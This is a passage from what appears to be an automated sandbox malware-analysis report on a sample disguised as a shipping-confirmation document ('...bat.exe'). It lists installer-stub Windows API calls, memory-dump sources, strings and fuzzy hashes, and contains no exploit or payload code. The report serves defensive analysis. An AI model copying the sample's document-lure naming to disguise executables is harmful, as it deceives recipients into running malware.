                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: Char$Next$Prev
                                                                            • String ID: "C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 589700163-3691885098
                                                                            • Opcode ID: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                                            • Instruction ID: f71de53da442769783aaa0cb2fea73a85be5ebad64e4744dd58b15c84f46a956
                                                                            • Opcode Fuzzy Hash: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                                            • Instruction Fuzzy Hash: 2211C8A580021295DB303B548D40B7766F8AF59790F56403FED96B3AC1E77C4C9282BD
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00404685
                                                                            • GetSysColor.USER32(00000000), ref: 004046C3
                                                                            • SetTextColor.GDI32(?,00000000), ref: 004046CF
                                                                            • SetBkMode.GDI32(?,?), ref: 004046DB
                                                                            • GetSysColor.USER32(?), ref: 004046EE
                                                                            • SetBkColor.GDI32(?,?), ref: 004046FE
                                                                            • DeleteObject.GDI32(?), ref: 00404718
                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404722
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                            • String ID:
                                                                            • API String ID: 2320649405-0
                                                                            • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                            • Instruction ID: a82f55cf926b6e885627a74f3bab1bdd796941bf972b84b6a5e459a8b365bc4c
                                                                            • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                            • Instruction Fuzzy Hash: 5C2177715007449BC7309F78DD48B577BF4AF42715B04893DEA96A36E0D738E944CB58
                                                                            APIs
                                                                            • GlobalFree.KERNEL32(00000000), ref: 733B25C2
                                                                              • Part of subcall function 733B12CC: lstrcpynW.KERNEL32(00000000,?,733B137F,00000019,733B11CA,-000000A0), ref: 733B12DC
                                                                            • GlobalAlloc.KERNEL32(00000040), ref: 733B2548
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 733B2563
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2155284752.00000000733B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 733B0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2155172212.00000000733B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2155846609.00000000733B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2155909402.00000000733B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_733b0000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                            • String ID: @Hmu
                                                                            • API String ID: 4216380887-887474944
                                                                            • Opcode ID: ad246ecfaae7bc0e341421153f1411752814a7e057c997986689992f8f956acd
                                                                            • Instruction ID: 3e1646181e8c605206c8af70f6fbb294f4bedd98200f5409a6cc385e5006fe1e
                                                                            • Opcode Fuzzy Hash: ad246ecfaae7bc0e341421153f1411752814a7e057c997986689992f8f956acd
                                                                            • Instruction Fuzzy Hash: 5F418BB1908389DFE735AF259850F26B7BDFB44310F104A1EE44AC6E81E73CA985CB61
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                                            • lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                                            • lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                                            • SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                            • String ID:
                                                                            • API String ID: 2531174081-0
                                                                            • Opcode ID: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                                            • Instruction ID: 0122bdc4cc194b68d617bf21deccaf32741d68d09ea49b6ef8aede989cb0ca1f
                                                                            • Opcode Fuzzy Hash: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                                            • Instruction Fuzzy Hash: F9219D71900618FACF119FA5DD84ACFBFB9EF45364F10843AF904B62A0C7794A419FA8
                                                                            APIs
                                                                            • DestroyWindow.USER32(00000000,00000000), ref: 0040304E
                                                                            • GetTickCount.KERNEL32 ref: 0040306C
                                                                            • wsprintfW.USER32 ref: 0040309A
                                                                              • Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                                              • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                                              • Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                                              • Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                                              • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                                              • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                                              • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 004030BE
                                                                            • ShowWindow.USER32(00000000,00000005), ref: 004030CC
                                                                              • Part of subcall function 00403017: MulDiv.KERNEL32(00000000,00000064,0003BF04), ref: 0040302C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                            • String ID: ... %d%%
                                                                            • API String ID: 722711167-2449383134
                                                                            • Opcode ID: 08ac34a4e5fc7f4836fd10a2a84a83e51d98fc20e7055cc4174bcdc419dd85dd
                                                                            • Instruction ID: 5115fc65002d889466af77c95cd87ea57bd417394e766d10746fa218fe5c3c06
                                                                            • Opcode Fuzzy Hash: 08ac34a4e5fc7f4836fd10a2a84a83e51d98fc20e7055cc4174bcdc419dd85dd
                                                                            • Instruction Fuzzy Hash: CA01C830642610E7CB31AF50AE09A6B3FACAB04706F64043BF441B11D9D6B85A51CF9D
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FD7
                                                                            • GetMessagePos.USER32 ref: 00404FDF
                                                                            • ScreenToClient.USER32(?,?), ref: 00404FF9
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040500B
                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405031
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Send$ClientScreen
                                                                            • String ID: f
                                                                            • API String ID: 41195575-1993550816
                                                                            • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                            • Instruction ID: f32abc49a7be06d84d864a503b70a66925f192d82b82ee1d40ead4c3c6165fb8
                                                                            • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                            • Instruction Fuzzy Hash: 79015E31900218BADB00DBA4DD85BFFBBBCEF55711F10412BBA51B61D0D7B4AA058BA5
                                                                            APIs
                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                                                                            • wsprintfW.USER32 ref: 00402FEA
                                                                            • SetWindowTextW.USER32(?,?), ref: 00402FFA
                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                            • API String ID: 1451636040-1158693248
                                                                            • Opcode ID: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                                            • Instruction ID: 34bde3d48a8f942e304b41271f5ed33cd318c4bcfffe3c394610842cbdf8d478
                                                                            • Opcode Fuzzy Hash: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                                            • Instruction Fuzzy Hash: 10F0317054020CABEF249F60DD4ABEE3B68EB40349F00C03AF606B51D0DBB99A55DB99
                                                                            APIs
                                                                              • Part of subcall function 733B12BB: GlobalAlloc.KERNELBASE(00000040,?,733B12DB,?,733B137F,00000019,733B11CA,-000000A0), ref: 733B12C5
                                                                            • GlobalFree.KERNEL32(?), ref: 733B2743
                                                                            • GlobalFree.KERNEL32(00000000), ref: 733B2778
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2155284752.00000000733B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 733B0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2155172212.00000000733B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2155846609.00000000733B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2155909402.00000000733B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_733b0000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc
                                                                            • String ID:
                                                                            • API String ID: 1780285237-0
                                                                            • Opcode ID: 0eea5a8b12b7b8bdb45ae9115d08947622783880005763b89c6c59b8d71658d6
                                                                            • Instruction ID: 3d54094cabb9978edb60fab4c39203b52df03461c1c3ff6c0b5ebc0ce230e189
                                                                            • Opcode Fuzzy Hash: 0eea5a8b12b7b8bdb45ae9115d08947622783880005763b89c6c59b8d71658d6
                                                                            • Instruction Fuzzy Hash: EE31FE72A04189EFE7369F51CD85F2AB7BEEB86300324062DF145C7A61E73C98058B69
                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                                            • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                            • String ID:
                                                                            • API String ID: 2667972263-0
                                                                            • Opcode ID: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
                                                                            • Instruction ID: 0665ed67c6e74a6a0a4f3ff5189880cf350c83190f31c90c7548f1ee6fedf688
                                                                            • Opcode Fuzzy Hash: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
                                                                            • Instruction Fuzzy Hash: 5731CF71D00124BBCF21AFA5CD89D9E7EB9AF48364F10023AF511762E1CB794C429B98
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F4F
                                                                            • wsprintfW.USER32 ref: 00404F58
                                                                            • SetDlgItemTextW.USER32(?,00422F48), ref: 00404F6B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                            • String ID: %u.%u%s%s$H/B
                                                                            • API String ID: 3540041739-2222257793
                                                                            • Opcode ID: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                                            • Instruction ID: 614c6b03a1206c52a907a8f7c7d2435543e043070c0789599254521b237785a9
                                                                            • Opcode Fuzzy Hash: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                                            • Instruction Fuzzy Hash: D911D5336041287BDB00666D9C45E9E329CEB85374F254637FA25F31D1EA79C82282E8
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2155284752.00000000733B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 733B0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2155172212.00000000733B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2155846609.00000000733B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2155909402.00000000733B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_733b0000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: FreeGlobal
                                                                            • String ID:
                                                                            • API String ID: 2979337801-0
                                                                            • Opcode ID: 39ef31c6ece13e76774a2901bc3646dfe181a2a12f09acea8dff6e8caab14c19
                                                                            • Instruction ID: 9b88fbd6e5406bb9a9856c889a2e802b2c0e255f1586f3a63c0d3578233bb26b
                                                                            • Opcode Fuzzy Hash: 39ef31c6ece13e76774a2901bc3646dfe181a2a12f09acea8dff6e8caab14c19
                                                                            • Instruction Fuzzy Hash: 0A51A372D00118EBDB32DFA4884079EBBBFEB44350F15415ED406A3A98F77DAA468791
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                                            • GetClientRect.USER32(?,?), ref: 00401DEA
                                                                            • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                                            • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                                            • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                            • String ID:
                                                                            • API String ID: 1849352358-0
                                                                            • Opcode ID: 5409701174cc037821a308746f1ef467676f72fb6d339cbf159e8a6e8e9d4097
                                                                            • Instruction ID: 305ae2269dae07fc62aa10ca295236b4d3f8ba7b944ef9ab65218e6e9e6ea469
                                                                            • Opcode Fuzzy Hash: 5409701174cc037821a308746f1ef467676f72fb6d339cbf159e8a6e8e9d4097
                                                                            • Instruction Fuzzy Hash: FE210772A04119AFCB15DF98DE45AEEBBB5EF08304F14003AF945F62A0D7789D81DB98
                                                                            APIs
                                                                            • GetDC.USER32(?), ref: 00401E56
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                                            • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                            • String ID:
                                                                            • API String ID: 3808545654-0
                                                                            • Opcode ID: 0c77369168bd7cf80ce1876f53bc619ac932c7fdeb75926795b65e903bb74869
                                                                            • Instruction ID: 3094fbe596e336cf4bf26b394f16fb1ed862d687e7810168c788cd964747d1d2
                                                                            • Opcode Fuzzy Hash: 0c77369168bd7cf80ce1876f53bc619ac932c7fdeb75926795b65e903bb74869
                                                                            • Instruction Fuzzy Hash: 74018871904240EFE7005BB4EE99BDD3FB4AF15301F20997AF581B62E2C6B904859BED
                                                                            APIs
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,733B22D8,?,00000808), ref: 733B16D5
                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,733B22D8,?,00000808), ref: 733B16DC
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,733B22D8,?,00000808), ref: 733B16F0
                                                                            • GetProcAddress.KERNEL32(733B22D8,00000000), ref: 733B16F7
                                                                            • GlobalFree.KERNEL32(00000000), ref: 733B1700
                                                                            Memory Dump Source
